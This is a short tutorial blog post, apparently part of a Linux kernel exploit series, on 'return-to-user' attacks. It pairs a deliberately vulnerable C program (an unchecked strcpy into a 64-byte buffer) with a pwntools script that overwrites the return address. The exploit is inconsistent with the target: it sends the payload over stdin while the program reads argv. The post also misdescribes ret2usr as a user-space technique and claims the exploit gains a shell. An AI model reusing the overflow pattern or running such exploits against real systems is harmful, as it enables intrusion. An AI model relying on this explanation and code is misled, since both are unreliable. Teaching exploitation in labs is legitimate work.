strangerRidingCaml
5. Return-to-User (ret2usr) Attacks 본문
728x90
Return-to-User (ret2usr) Attacks
Return-to-user (ret2usr) attacks are a type of exploitation technique where an attacker overwrites the return address on the stack to redirect the program execution flow to a user-space function, typically one that allows the attacker to gain elevated privileges or execute arbitrary code.
Lab Activity: Return-to-User (ret2usr) Attack
In this lab activity, we'll demonstrate a simple ret2usr attack on a vulnerable C program.
Defender Side Code:
#include <stdio.h>
#include <string.h>
void vulnerable_function(char *input) {
char buffer[64];
strcpy(buffer, input);
}
int main(int argc, char **argv) {
if (argc != 2) {
printf("Usage: %s \n", argv[0]);
return 1;
}
vulnerable_function(argv[1]);
return 0;
}
To compile the defender side code:
gcc -o vulnerable_program vulnerable_program.c
Exploit Code (Python using pwntools):
from pwn import *
# Address of the user-space function we want to execute
user_function_addr = 0x00400560
# Padding to overwrite the return address
padding = b"A" * 72
# Payload to redirect program execution to the user-space function
payload = padding + p64(user_function_addr)
# Establishing connection to the vulnerable program
p = process("./vulnerable_program")
# Sending the payload
p.sendline(payload)
# Interactive shell
p.interactive()
The exploit code constructs a payload with padding to overwrite the return address and redirects the program execution to the user-space function by providing its address. It then establishes a connection to the vulnerable program, sends the payload, and gains an interactive shell upon successful exploitation.
'Linux kernel exploit' 카테고리의 다른 글
7. Write-What-Where (Arbitrary Memory Overwrite) (0) | 2024.05.12 |
---|---|
6. Return-Oriented Programming (ROP) (0) | 2024.05.12 |
4. Stack Smashing (32-bit and 64-bit) (0) | 2024.05.12 |
3. Debugging Kernel and Modules (0) | 2024.05.12 |
2. Development of Kernel Module (0) | 2024.05.12 |